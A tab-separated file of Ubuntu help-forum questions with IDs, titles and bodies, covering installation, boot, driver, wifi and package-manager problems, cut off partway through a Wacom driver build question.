384151	fresh xubuntu install erased other partitions	i got bored of my windows 7/fedora dual boot and decided to install xubuntu 13.04 ( yes , i know it 's outdated , but i intended to upgrade later ) over fedora . this was my drive structure : /dev/sda : windows 7 ( ntfs ) old ubuntu install ( ext4 ) /dev/sdb : games partition ( ntfs ) fedora ( ext4 ) general use partition ( ntfs ) when i installed xubuntu , it gave me the option to erase fedora , so i did . the problem was that ubiquity decided that the games and general use partitions were part of fedora and so deleted them . is there any way i could recover these partitions ? i do n't much fancy re-downloading the 200gb or so of games ...
384152	is that possible to add icons to the login screen top-panel ?	is that possible to add icons ( other than defaults ) to the login screen top-panel ? if yes then which applications icons will be added to the login screen top panel other than the defaults ( onboard , sound , network-manager , etc ) .and how do i add that ? i am running ubuntu 13.10
384155	chromium stopped downloading files	chromium stopped downloading files on one pc . it does n't work whether it 's pdf file from a website or photos from another . when i download from firefox , it works . so i know that something broke on chromium . when i go to the application download page , it 's all blank . this page normally shows history of all your downloaded files . what could have possibly broke ? i 'm a newbie that 's why i do n't know where to start digging . appreciate any help .
384157	how can i get rid of the message `` duplicate sources.list entry	duplicate sources.list entry http : //archive.ubuntu.com/ubuntu/ saucy/restricted amd64 packages ( /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_saucy_restricted_binary-amd64_packages ) w : duplicate sources.list entry http : //archive.ubuntu.com/ubuntu/ saucy/restricted i386 packages ( /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_saucy_restricted_binary-i386_packages )
384158	how do i enable cgi execution in the root directory of apache	i have built an ubuntu server and need to execute cgi scripts in the root directory . i keep finding tutorials on how to execute them from cgi-bin but that is n't desired in my situation . i 've installed apache2 only ( no mysql or php ) as i will be using python and mongodb . thanks .
384162	login screen shows `` user '' instead of my actual account name	so i installed ubuntu 12.04 , created my admin account as well as 2 non-admin accounts . now , at the login page , it displays my account name as `` user '' instead of my actual account name . everything else is normal ( the 2 other account names are displayed correctly ) . when i log in and open a terminal , the prompt is jfk @ ubuntu and my home is /home/jfk as expected . any idea ?
384164	curious thing happened after grub install	my friend got a vaio notebook which runs windows 8 professional edition . i installed ubuntu 13.10 - 64 bit on it using a pen drive . after installation i again live booted and installed grub on the system . after successful installation rebooted and got the grub and boot into the ubuntu . after working in it for some time i restarted the system to check whether the windows got any problem . but this time i got no grub and the system boot directly into windows 8 . help me ! now my friend ca n't access the ubuntu installed in his vaio .
384168	how to cross compile for mips on ubuntu	i 'm trying to find a way to install transmission on my home router . the device has a mips architecture and i downloaded the sources of transmission from its website . now i think i 'd need to cross-compile the sources on my ubuntu machine for the target architecture ( mips ) . i found several guides for other operating systems ( esp . debian ) but nothing for ubuntu . which packages and settings ( paths , enviromental vars , ... ) do i need to cross compile a generic source for mips architecture ?
384171	how to fix boot-repair aborted message when converting to separate efi from bios mode ?	i have installed ubuntu on pre-installed windows 8 laptop . i installed ubuntu in bios mode . as windows 8 is in efi mode i have to convert ubuntu also in efi mode . to do this i downloaded boot-repair and made my usb bootable . when i go to boot-repair after selecting the option separate efi partition and clicking on apply it gives me message aborted .
384172	playing games in ubuntu	is there any chance anyone played cricket 2007 in ubuntu ? i use 13.04 and any idea how to do it if it is possible ? it does not work with wine . any other software that does not want me to pay ?
384176	installing ubuntu from disk and few other quesions	so i decided to finally download ubuntu , i notice the file is an .iso , does that mean i need to decompress it before burning it to a disk ? that can be done with something like winrar , yes ? or does windowsxp already have something to decompress files ? what program would you recommend using to burn it and at what write speed ? i was thinking of going with cdburnerxp . strong text*i tried infra recorder and cdburnerxp- both are n't working , is it because i 'm using windowsxp in safe mode ? *strong text
384177	special characters	after upgrading to 13.10 i can not enter special characters anymore . so i can not write either french or french special characters ( that are not directly available in the french or the german keyboards ) i tried to change the configuration of the keyboard using the following command dpkg-reconfigure keyboard-configuration . but to no avail for right alt remains dead . i tried also to change via he system settings again to no avail .
384184	does the below mentioned packages come along with ubuntu 12.04	g++ gnu make gnu bison flex gnu libiconv gnu gmp gnu mpfr gnu mpc gcc if not what if i remove my gcc packages and install them from tarballs provided by gcc.gnu.org does the packages come with gcc compiler package ? ?
384193	wireless not enabled in ubuntu 12.04	iâm using ubuntu 12.04 lts . my hardware is the following : network controller : ra-link corp. rt3290 wireless 802.11n 1t/1r pcie . ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci . what do i need to do to enable my wifi ?
384194	dwm does not show any windows after login	ubuntu 12.04 , dwm 6.0 when i login to my ubuntu box , only dwm toolbar is shown on the top of the screen . everything else is filled with the ubuntu login screen remains , inactive . i guess this happened after one of the updates â earlier dwm worked fine , but became broken after a reboot . any clues on how to fix that ? i was not able to google up a solution ...
384197	problem in compile qcadesigner	i want to complie qcadesigner in my ubuntu . i ran following commands respectively : $ ./autogen.sh $ autoconf configure.in $ ./configure none of the above commands did not return error in output but after i ran 'make ' command after about one min that 'make ' command return output i got this error : making check in src make [ 1 ] : entering directory `/home/woeful/desktop/qcadesigner-2.0.3/src' make [ 1 ] : nothing to be done for `check ' . make [ 1 ] : leaving directory `/home/woeful/desktop/qcadesigner-2.0.3/src' making check in po make [ 1 ] : entering directory `/home/woeful/desktop/qcadesigner-2.0.3/po' file=./`echo de | sed 's , . */ , ,'`.gmo \ & & rm -f $ file & & /usr/bin/msgfmt -c -o $ file de.po /usr/bin/msgfmt : de.po : warning : po file header missing or invalid warning : charset conversion will not work /usr/bin/msgfmt : found 1 fatal error make [ 1 ] : *** [ de.gmo ] error 1 make [ 1 ] : leaving directory `/home/woeful/desktop/qcadesigner-2.0.3/po' make : *** [ check-recursive ] error 1 this is source code address http : //www.mina.ubc.ca/qcadesigner_downloads thanks .
384198	problem during installation on ssd	my system run windows 8 updated to 8.1 . because of incompatibility from windows 8.1 with my hardware ( old mb asus p5bse with core2 quad q6600 , but the disk is a ssd samsung 830 series ) , i want to delete all and install ubuntu . when i try to install v12.04.3 , i read this error ( in italian ) : tentativo di montare un file system di tipo ext4 in scsi ( 0,0,0 ) ... non riuscito . how to solve ? ?
384199	how do i restore files from ubuntu one ?	i want to use ubuntu one as purely a backup for important folders . when i look in the ubuntu app i just see folders with a number so i assume it is encrypted . so i cant just drag them back to my pc . i ca n't see any way to do a partial or full restore . can someone explain to me how to do this please ?
384201	ca n't run ubuntu 13.10 after fresh installation	i 've been fighting to install ubuntu 13.10 on my asus eee 1215b for a while now . i install it from my pendrive ( files on it are not corrupted , i 've checked it ) . the problem is , that when i reboot my pc after installation , the only thing i see is black screen with a blinking cursor ( but i ca n't write anything ) . there 's no grub . i 've tried some solutions i 've found online , like holding shift key or some key combinations , but the only combination my pc responds to is ctrl+alt+del ( reboot ) . what might matter in my situation is that i messed up the first installation ( i used the wrong option ) , i lost previous partition with important data , but restored them using testdisk running from livecd ( i 've created another partition and just copied the data i needed ) . how to solve this ?
384202	wifi not working compaq 6510	how do i get wifi to work on this machine ? i installed ubuntu a while ago and eventually got the wifi to work after hunting around on the forums . now i ' ve installed 13.10 but ca n't remenmber how to install the wifi
384204	having many issues trying to dual boot ubuntu with windows 7	i am currently trying to dual boot ubuntu 12.04 lts along with windows 7 on my computer , but am running into a problem . ubuntu installer can not seem to see my windows 7 . these are the only choices i get . http : //i.imgur.com/x5mevyl.png is there anything i can do about this ?
384206	ubuntu server on virtualbox do n't let me install anything	i just installed ubuntu server 12 in a virtual machine in virtualbox , but apt-get did n't let me install anything , when i tried apt-get install git i got failed to fetch errors , failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/main/g/git/git-man_1.7.9.5-1_all.deb connection failed [ ip : 91.189.91.15 80 ] after that i run apt-get updateeverything goes well except for 2 urls . w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/release.gpg connection failed [ ip : 91.189.91.15 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/precise-security/release.gpg connection failed [ ip : 91.189.91.14 80 ] i tried to wget http : //us.archive.ubuntu.com/ubuntu/pool/main/g/git/git-man_1.7.9.5-1_all.deb i have this error : http request sent , awaiting response ... read error ( connection reset by peer ) in headers . edit : here is my networking configuration : yes i can ping the ip : 91.189.91.15 from both the guest ( my machine ) and the host ( the virtual one ) .
384208	which os would be the most compatible ?	my notebook is samsung np-n102s and i would like to ask which os from ubuntu or linux would be the most compatible with that ? the specifications of the notebook can be found here .
384209	problem with auto log in	i have installed several desktop-environments . when one is used , next time , i 'm automatically logged in it ( without entering log-in password ) . the problem is that i logged into a desktop environment ( cinnamon ) , but it seems to be incompatible with my computer and the computer hangs immediately ( after log-in ) . even if i restart the computer ; again , i 'll be logged into the same desktop automatically and the computer freezes again . no way to escape except command line . is there a command to change the default log-in on next restart . or a way to prevent auto-log-in in such a situation ?
384212	touchpad left clicks randomly	i have installed ubuntu 13.10 on a samsung ativ book 9 np900x3f-k03se , and the touchpad left clicks randomly and very often , so it is completely unusable . even if i do n't touch the touchpad it randomly left clicks . below have i attached the output from xinput . question have anyone seen a similar problem and perhaps a fix/workaround ? # xinput list-props `` etps/2 elantech touchpad '' device 'etps/2 elantech touchpad ' : device enabled ( 134 ) : 1 coordinate transformation matrix ( 136 ) : 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 device accel profile ( 260 ) : 1 device accel constant deceleration ( 261 ) : 2.500000 device accel adaptive deceleration ( 262 ) : 1.000000 device accel velocity scaling ( 263 ) : 12.500000 synaptics edges ( 264 ) : 118 , 2846 , 101 , 1771 synaptics finger ( 265 ) : 1 , 1 , 0 synaptics tap time ( 266 ) : 180 synaptics tap move ( 267 ) : 154 synaptics tap durations ( 268 ) : 180 , 180 , 100 synaptics clickpad ( 269 ) : 1 synaptics middle button timeout ( 270 ) : 0 synaptics two-finger pressure ( 271 ) : 282 synaptics two-finger width ( 272 ) : 7 synaptics scrolling distance ( 273 ) : 70 , 70 synaptics edge scrolling ( 274 ) : 0 , 0 , 0 synaptics two-finger scrolling ( 275 ) : 1 , 1 synaptics move speed ( 276 ) : 1.000000 , 1.750000 , 0.057061 , 0.000000 synaptics off ( 277 ) : 1 synaptics locked drags ( 278 ) : 0 synaptics locked drags timeout ( 279 ) : 5000 synaptics tap action ( 280 ) : 2 , 3 , 0 , 0 , 1 , 3 , 0 synaptics click action ( 281 ) : 1 , 3 , 0 synaptics circular scrolling ( 282 ) : 0 synaptics circular scrolling distance ( 283 ) : 0.100000 synaptics circular scrolling trigger ( 284 ) : 0 synaptics palm detection ( 285 ) : 0 synaptics palm dimensions ( 286 ) : 10 , 200 synaptics coasting speed ( 287 ) : 20.000000 , 50.000000 synaptics pressure motion ( 288 ) : 30 , 160 synaptics pressure motion factor ( 289 ) : 1.000000 , 1.000000 synaptics resolution detect ( 290 ) : 1 synaptics grab event device ( 291 ) : 1 synaptics gestures ( 292 ) : 1 synaptics capabilities ( 293 ) : 1 , 0 , 0 , 1 , 1 , 1 , 1 synaptics pad resolution ( 294 ) : 32 , 32 synaptics area ( 295 ) : 0 , 0 , 0 , 0 synaptics soft button areas ( 296 ) : 1482 , 0 , 1535 , 0 , 0 , 0 , 0 , 0 synaptics noise cancellation ( 297 ) : 17 , 17 device product id ( 253 ) : 2 , 14 device node ( 254 ) : `` /dev/input/event5 ''
384216	terratec aureon usb 7.1 drivers keep disappearing	i have an ubuntu 12.04 64-bit and a usb terratec aureon external sound card and 5.1 speakers . i was trying to configure the usb driver with no success , so i found the following solution on web : sudo apt-get update sudo apt-get upgrade sudo apt-get install -- reinstall alsa-utils alsa-oss alsa-base libasound2 libasound2-plugins linux-sound-base gstreamer0.10-alsa but the problem is that sometimes when i turn on my laptop i keep loosing the option from the sound settings ... the weird thing is that this just happens only some times.. any ideas , suggestions ?
384218	how to install projet igi 2	how do i install project igi 2 in ubuntu 12.04 ? i am new to ubuntu . my laptop model is lenovo 2049 with 1gb ram and celeron processor . please help me .
384224	which os would be the most compatible with samsung np-n102s ?	which os from ubuntu or linux would be the most compatible with that ? the specifications of the notebook can be found here .
384226	sakis 3g configuration ( auto user name and password )	all , i am using sakis 3g to connect to internet because most of times , my modem does n't get detected in network manager and modem detection is very slow as compared with sakis3g . i just downloaded the script and made it executable and created a shortcut on the desktop . this is how i run it . it is in my home folder . i want to automate connection process and to be more friendly . everytime i connect , it asks me to choose , apn and user name and password , apn part is all right , i want it to let me select from a list of apn because many times i need to change provider . but user name and passwords all are blank , for all providers . i want to enter some random user name and password , and want sakis 3g does n't ask for them . i know this can be done , but i do n't know the process , because it is mentioned , see these screenshots . https : //drive.google.com/folderview ? id=0bwaisn4xultbzunosmn1q3jtcda & usp=sharing if this is not the recommended way to use script , then tell me how to install , and where to install . thanks in advance ! !
384228	remove alacarte apps	yeah , i know there already is similar question on askubuntu ( where does alacarte store the file with the edited menus ? ) but there are no apps i created with alacarte . i created few testing shortcuts or apps or whatever they 're called ( sorry , i 'm new to ubuntu ) they worked without problems , but there was no icon , so i created next one . and so on and on . so now there are lot 's of annoying apps showed in dash menu search and i ca n't get rid of these . they 're not in /usr/share/applications they 're not anywhere in my computer . i tried to uninstall alacarte with no success . how to solve this ?
384230	openoffice 4 on ubuntu	how do i install the latest version of apache openoffice on ubuntu 13.10 ( kubuntu to be more precise ) without uninstalling libreoffice . yes i know lo is better for some reasons ( i did my homework ) but i want to install aoo for testing purposes . preferably with a regularly updated ppa .
384231	ca n't get lexmark x6675 scanner to work	i have a problem with my lexmark x6675 scanner on ubuntu 13.1 64 . i have installed driver and the printer works fine both via usb and wifi . but simple-scan does n't detect scanner ( device is connected via usb ) , sane-find-scanner also detects nothing . any ideas ?
384234	e : mysql-server-5.5 installation error	i have unsuccessfully been attempting to install mysql-server for a while on my ubuntu vps during a fresh install ( fully purged all mysql related packages ) partway through the installation it asks for the root password to be set after which it presents an error screen containing : an error occurred while setting the password for the mysql administrative user . this may have happened because the account already has a password , or because of a communication problem with the mysql server . unpacking mysql-server ( from ... /mysql-server_5.5.34-0ubuntu0.12.04.1_all.deb ) ... processing triggers for man-db ... setting up libmysqlclient18 ( 5.5.34-0ubuntu0.12.04.1 ) ... setting up libdbd-mysql-perl ( 4.020-1build2 ) ... setting up mysql-client-core-5.5 ( 5.5.34-0ubuntu0.12.04.1 ) ... setting up mysql-client-5.5 ( 5.5.34-0ubuntu0.12.04.1 ) ... setting up mysql-server-core-5.5 ( 5.5.34-0ubuntu0.12.04.1 ) ... setting up mysql-server-5.5 ( 5.5.34-0ubuntu0.12.04.1 ) ... 131130 18:01:34 [ warning ] using unique option prefix key_buffer instead of key_buffer_size is deprecated and will be removed in a future release . please use the full name instead . start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing mysql-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of mysql-server : mysql-server depends on mysql-server-5.5 ; however : package mysql-server-5.5 is not configured yet . dpkg : error processing mysql-server ( -- configure ) : dependency problems - leaving unconfigured processing triggers for libc-bin ... no apport report written because the error message indicates its a followup error from a previous failure . ldconfig deferred processing now taking place errors were encountered while processing : mysql-server-5.5 mysql-server e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i have attempted a few fixes involving apparmor related stuff before i realised that apparmor is not mentioned in the error logs unlike alot of other people having similar issues . any help on this matter would be greatly appreciated . edit : any attempts to continue or configure the installation after this point are simply met with further error messages
384235	using the workspaces independently from one another ?	i am a new ubuntu user ( migrating away from microsoft/windows ) using ubuntu 13.10 . i like the feature of multiple workspaces . currently , when i move between the four different workspaces , everything that i am doing in one of the workspaces follows me to the other . if i have libreoffice up in one , the same documents are up in the other . likewise , if i have a browser open , everything in that browser follows me to the other workspace . is there a way to have each workspace be completely independent of the other ? thanks much for your answers !
384240	ubuntu 13.10 recognizes wifi networks but wo n't connect ( bcm4313 )	so , i partitioned my hard driver and installed windows 7 and ubuntu 13.10 in partition c : . first i installed windows and got the wifi device working by installing the proper drivers for broadcom bcm4313 . then , after installing and while loged in ubuntu 13.10 , it recognizes my network and asks for the password , but wo n't connect . also i tried this http : //askubuntu.com/a/368467/176713 and despite the fact that i do n't know what it means , terminal did n't recognize the second command line as well . please , send help . and sorry for my bad english .
384241	installing ubuntu along windowsxp 32 bit	i have windows xp pro+service pack 3 ( 32 bit ) .i want to install ubuntu on my desktop along with windows xp . can any one tell me whether i have to partition my hard disk manually before the installation process or is it done automatically by ubuntu during installation.i am new to this platform so a step by step explanation would be appreciated .please help . its urgent ... ... ..thank you .
384242	wireless on an acer aspire v5-571p does not work	my built in wireless card just is n't possible to switch on . i have run out of ideas to try to enable it or install the driver . when i run rfkill it shows no hard block and no soft block , i have been trying this for days know any just do n't know what to do . i have already tried looking for instructions but nothing could be found . lspci -v returns the following : 03:00.0 network controller : broadcom corporation bcm43228 802.11a/b/g/n subsystem : foxconn international , inc. device e04b flags : bus master , fast devsel , latency 0 , irq 19 memory at f0500000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : bcma-pci-bridge
384244	shrink the disk ( vdb ) then mount it root	filesystem size used avail use % mounted on /dev/vda1 5.0g 796m 3.9g 17 % / none 2.0g 176k 2.0g 1 % /dev none 2.0g 0 2.0g 0 % /dev/shm none 2.0g 40k 2.0g 1 % /var/run none 2.0g 0 2.0g 0 % /var/lock none 2.0g 0 2.0g 0 % /lib/init/rw none 5.0g 796m 3.9g 17 % /var/lib/ureadahead/debugfs /dev/vdb1 197g 188m 187g 1 % /data as we can see , /dev/vda1 is mount on root , but the size is too small.i cant make installation there . the idea is to shrink some /dev/vdb1 then mount it to root and delete /dev/vda1.. so i can make my installations . how to do it ?
384246	how do i get a realtek 8821 wireless card working ?	i have a transformer book trio , and just like there , ubuntu seems not to see the wifi card . here are the two commandlines i used : $ iwconfig lo no wireless extensions . $ lspci -nn | grep -i net 02:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. device [ 10ec:8821 ]
384248	why ca n't i move folders to network share that i have 777 permissions ?	i have a network share on an ubuntu machine sharing through samba . accessing it on windows machines , i have full access to read/write . from my other ubuntu machines , i show read/write access and full permission , but when i try to move a folder to the directory , it creates the folder without write permissions , then fails the move . what can i do to fix this ?
384250	what is the command to switch to normal user ?	i am trying to `` su/sudo '' command to switch to a regular user . it asks me password and i enter admin password then it says su : authentication failure . how can i switch to regular user , what is the problem ? walter @ walter-virtualbox : ~/testdir $ su password : su : authentication failure walter @ walter-virtualbox : ~/testdir $
384253	is there any software to convert between iso and cso ?	is there any software that is available for ubuntu to convert between cso files and iso ? i wanted to convert my cso files to iso for playing games on my psp .
384255	get sound from a windows vm to ubuntu via network	i 'm using xen to passthu my graphics card so that i can play in my windows vm . everything works fine , i 'm sharing my ubuntu 's mouse with the windows guest via network ( really good latency , i do n't feel any difference . well , if i want to play a game and i already listen to music in ubuntu , i 'd like to listen the ingame sound . so i connected a usb soundcard with my mic ( or line ) input of my onboard sound ( belongs to ubuntu , ca n't passthru that ) but the latency was kinda shitty ( really bad for games ) . do you have ideas to send the audio with a good latency to ubuntu ? thanks
384259	reinstall package that was not from repo from ubuntu repository	i 've added ppa repository with some package ( s ) with versions greater that versions in official ubuntu repository . after that i upgraded ( sudo apt-get install upgrade ) , then i delete ppa . now i want to delete this packages and reinstall versions from officialrepo . how do i do that ? i do n't want delete package that depends on these ones . ubuntu version is 13.10
384262	ubuntu disk will not mount	here is the error error mounting system-managed device /dev/sdb1 : command-line `mount `` /mnt/287319a7-69ba-45b8-b8bf-e2fd4d6ea6f0 '' ' exited with non-zero exit status 32 : mount : wrong fs type , bad option , bad superblock on /dev/sdb1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so
384266	low graphics mode 13.10	i 've bought a new lenovo laptop ( g500 ) . i replaced win 8 with win 7 and then i installed ubuntu 13.04 . everything was fine but about an hour later ubuntu 13.10 was released so of course i updated ! when i booted up ubuntu 13.10 i had the low graphics mode problem . i tried all these how to fix `` the system is running in low-graphics mode '' error ? but nothing works . any suggestion ? edit : i wiped everything and reinstalled win 7 and ubuntu 13.10 from scratch and i also installed ubuntu without win 7 . the problem was still there . i now run the laptop with win 7 only and i ca n't just erase them if something goes wrong because i have important files in there and no external storage to save them !
384267	if i create my own distro , how would i change text displayed when booting ( eg `` ubuntu 13.04 '' ) ?	i 'm trying to make my own distro . i have made quite some progress , but i 'm now stuck at changing the text displayed while the system is booting . when my customized ubuntu mini remix is booting and it is on the reddish screen with a progress bar , ubuntu 13.04 is displayed above the progress bar ( those few dots changing colors ) . how can i change this ? i have tried in many ways . ubuntu-builder did n't change it and even editing some configuration files did n't give me any results .
384271	how to replace pictures in libre office document	i have a document that i want to use as a template every so often , i will change the pictures and some of the documents , but want to keep the general layout . i have been able to do the replace picture thing in ms word , and from the reading i have done , it looks like it was also done easily in open office , how can we do this on libre office ?
384272	bluetooth keyboard laggy on reconnect	i have a bluetooth 3.0 keyboard that i successfully paired to ubuntu . when connected it works very well , with no lag or latency . every time the bluetooth connection is lost ( eg : after a long idle time or on reboot ) the keyboard tries to reconnect ( by pressing any key ) , the connection is established but the keyboard is extremely unresponsive and laggy . typing is very slow and characters get repeated multiple times . if i turn off the keyboard ( it has an on/off switch ) and then on again usually the connection is established correctly . disconnecting and reconnecting the keyboard from the bluetooth panel does n't work instead .
384274	i have seen these in when trying to build a cross compiler what does these mean	../gcc-x.y.z/configure -- target= $ target -- prefix= '' $ prefix '' -- disable-nls -- enable-languages=c , c++ -- without-headers export prefix= '' $ home/opt/cross '' export target=i586-elf export path= '' $ prefix/bin : $ path ''
384276	automatically select scan area in xsane	i 'm using xsane to scan some documents ( of various page sizes ) and i 'd like to configure it to automatically scan/select the document itself without needing a preview . the reason i ask is that i 've just reinstalled my operating system ( and therefore xsane ) and i could swear that xsane did this automatically when i pressed scan on my old system . any thoughts ? thanks in advance
384279	mts mblaze not detecting in ubuntu 12.04lts	my mts mblaze is not detecting in ubuntu 12.04lts . when i tried to install mblaze driver it shows ndis driver missing . again tried commenting dkg line in code . even though i 'm not able to install my mblaze . please help . ?
384280	does clonezilla format the destination hdd ?	i want to make an image of my os partitions . i just have a hdd with important data on it here which i wo n't format because of it 's data . now i want to know if clonezilla formats the destination hdd or if it just adds some data in form of compressed .zips or so on ?
384282	microsoft surface pro 2 , dual booting ubuntu secure remix 13.04 does not work , live usb	if i boot from the live usb and just select 'try ubuntu without installing ' it hangs on a black screen . if i go into edit options and type in 'only-ubiquity nomodeset ' and remove 'quiet splash ' and boot , it works . however i need unity , because i need to make sure if grub is fixed ( with the boot repair tool ) . and i ca n't open terminal either in this mode to just do that . please help me .
384286	how do i install drivers for a nvidia 720m on ubuntu 12.04 ?	today i installed ubuntu for the very first time . i am having trouble installing any drivers for my gt 720m card . i 've tried to follow the guides for general nvidia driver installation but have n't had any success . likewise , the `` additional drivers '' program fails to detect anything . i would really appreciate any instructions to be typed out in baby-steps . traditionally , i 'm a windows user , and i 'm unfamiliar with what are , probably , basic operations .
384287	trouble booting ubuntu after install	i have been having trouble installing ubuntu/mint on a gateway all-in-one computer . i have set the boot order . if i let the computer boot up , it gives me the error message , `` reboot and select proper boot device or insert boot media in selected boot device and press a key '' . ( this is while i have a usb flash drive with an operating system plugged in . ) if i press f12 when i get the message `` press f12 display boot menu '' , i get the options uefi : wdc wd5000aakx-001ca0 uefi : kingstondt 101 g2 1.00 ( flash drive ) po : wdc wd5000aakx-001cao kingstondt 101 g2 1.00 ( same flash drive ) . if i select uefi : wdc wd5000aakx-001ca0 or po : wdc wd5000aakx-001cao , i get the error message , `` reboot and select proper boot device or insert boot media in selected boot device and press a key '' . if i select uefi : kingstondt 101 g2 1.00 , i get the gnu grub version 2.00-13ubuntu3 menu . if i select kingstondt 101 g2 1.00 , i get the standard boot up . i have run through the install , replacing the previous operating system . i have done this with both , linux mint 15 and ubuntu 13.10 . everything installs fine , but when it asks you to restart the computer , i select restart now . if i let the computer boot up on it 's own i get the same `` reboot and select proper boot device or insert boot media in selected boot device and press a key '' error . if i open up the boot menu and try them all the only one 's to work are uefi : kingstondt 101 g2 1.00 ( flash drive ) and kingstondt 101 g2 1.00 ( same flash drive ) . if i run through the install again , i am given the option to replace the operating system i just tried to install . i know that there is nothing wrong with the hard disk , install file , or flash drive . if i try and boot from a disk , it does not find it , even though i have it set to the top of the boot order . sorry for the very wordy post , but i felt the need to provide as much information as possible . i have tried all of the basic remedies and would appreciate some enlightenment .
384288	what is the terminal command to clear the message menu ?	i would like to associate a keyboard shortcut or an easystroke gesture to the action of clearing my message menu ( i.e. , the end result should be equivalent to clicking the envelope icon and then `` clear '' ) . i 've found here the following command that should have done it : gdbus call -- session -- dest com.canonical.indicator.messages -- object-path /com/canonical/indicator/messages/service -- method com.canonical.indicator.messages.service.clearattention however , this does n't seem to work on 13.10 . running it through a terminal gives me the following error : error : gdbus.error : org.freedesktop.dbus.error.unknownmethod : no such method 'clearattention' my dconf has com.canonical.indicator.messages , but nothing but an `` applications '' entry in there . how can i make this work ?
384291	what is the difference between installing raid form bios and from disk utility in installing system ?	what is the difference in configuring raid in idrak bios and configuring raid in installing ubuntu or any other system ? ? is it faster in configuring raid from bios and more good performance and can i configure specific part-ions to be raid 0 or 1 from bios as i can do it in the installations .
384293	after deleting some apps i ca n't pass the login screen	i have applied mac os x theme to my ubuntu 13.10 , and then got bored adn tried to revert it . instead of trying to change themes first from the unity tweak tools , i tried to uninstall everything i could from the application center ( not the things that come with ubuntu itself ) . not i can see my log in screen and enter my password , but then nothing happens . it accepts my password ( the bar dissappears ) and it stays there forever . the wi-fi , turn off the computer buttons on the top right works . but the screen does not continue to my desktop.. it just stays there waiting in my log in screen.. note : guest logging in does not work either..
384294	sudo emacs crashes with tramp when i start a line with /	i run emacs in command line [ -nw ] on ubuntu 12.04 as root . if i start a line with '/ ' , emacs freezes for a while and displays `` tramp : waiting for prompts from remote shell '' . please note that i do n't really know what tramp is . ( via google , it seems to open files through ssh ) . anyone know what this is , and how to stop it ?
384295	need help installing ubuntu from a different iso while booting from usb	i have my system booted with ubuntu13.04 on a usb pendrive ( micro-sd card type ) and when i try to install it gives me an io error . ( also no cdrom ) so now without any success i have tried to install the ubuntu image saved in one of my hard drive to another hard drive . if any one can help me please let me know thanks .
384297	blutooth always on after reboot	i do n't use bluetooth on my laptop . but my ubuntu installation does n't remember my preference to switch-off bluetooth . after rebooting , blutooth is again switched on . what is the reason ? what is the solution ? mine is ubuntu 13.10 on a dell inspiron laptop thanks , kk
384301	gnome3 : disable dialog for nfs devices	i am mounting 3 nfs devices via fstab . as soon i log in , i am getting the following dialog for each nfs device : how can i disable this dialog only for nfs devices , but not for usb devices ( as usb stics or usb hard disks ) ?
384305	ubuntu is reading my thumbstick as a hard drive and its not reading my ard drive as my hard drive at all	this is what is says when i check sudo fdisk -l disk /dev/sda : 4004 mb , 4004511744 bytes 255 heads , 63 sectors/track , 486 cylinders , total 7821312 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x31040d40 device boot start end blocks id system /dev/sda1 * 63 7821311 3910624+ c w95 fat32 ( lba ) is there any way to make it read my hard-drive and because its not reading my hard drive i wo n't be able to install ubuntu .
384306	mounting ( possibly corrupt ) ufs disk from nas4free	i have a hard disk that i was previously using in a system installed with nas4free . unfortunately , the system seemed to stop working and , if possible , i would like to retrieve some files from the hard disk . i 've booted the system into ubuntu through a live cd , but i 'm having trouble mounting the disk . i 'm still new to ubuntu so i do n't understand much of it . this is the output i get from sudo fdisk -l : ubuntu @ ubuntu : ~ $ sudo fdisk -l disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x90909090 device boot start end blocks id system /dev/sda1 * 63 4080509 2040223+ a5 freebsd partition 1 does not start on physical sector boundary . /dev/sda2 4080510 1949439554 972679522+ a5 freebsd partition 2 does not start on physical sector boundary . /dev/sda3 1949439555 1953520064 2040255 a5 freebsd partition 3 does not start on physical sector boundary . following another thread , i also tried dmesg | grep bsd and got : ubuntu @ ubuntu : ~ $ dmesg|grep bsd [ 6.668810 ] sda1 : < bsd : sda5 > [ 6.668810 ] sda2 : < bsd : bad subpartition - ignored i 've tried the command sudo mount -r -t ufs -o ufstype=ufs2 /dev/sda5 /usr/disk ( where /usr/disk is a directory i have created ) but this does n't work . does anyone have any solutions/suggestions ? thanks .
384307	installing new wacom driver for cth-680 or cth-480	info : this is not needed in ubuntu 14.04 anymore . the tablets cth-480 and cth-680 work out of tho box now i bought a wacom graphic tablet and missed to look if it is supportet by ubuntu . the tablet is a cth-680 called `` intuos pen & touch '' . i found , this answer on askubuntu for a cth-480 . and the patch there seems to also include the cth-680 my ubuntu version is 13.10 the tablet is found with lsusb : bus 001 device 012 : id 056a:0303 wacom co. , ltd what i did so far : sudo apt-get install build-essential libx11-dev libxi-dev x11proto-input-dev xserver-xorg-dev libxrandr-dev libncurses5-dev autoconf libtool libudev-dev mkdir ~/wacom cd ~/wacom git clone git : //git.code.sf.net/p/linuxwacom/xf86-input-wacom git clone git : //git.code.sf.net/p/linuxwacom/input-wacom then i downloaded and applied the patches : http : //sourceforge.net/p/linuxwacom/mailman/message/31592023/ as attachments to this post http : //sourceforge.net/p/linuxwacom/mailman/message/31599376/ 0001-input-wacom-not-all-multi-interface-devices-support-.patch 0002-input-wacom-add-support-for-three-new-intuos-devices.patch cd input-wacom patch -p1 < ~/downloads/0001-input-wacom-not-all-multi-interface-devices-support-.patch patch -p1 < 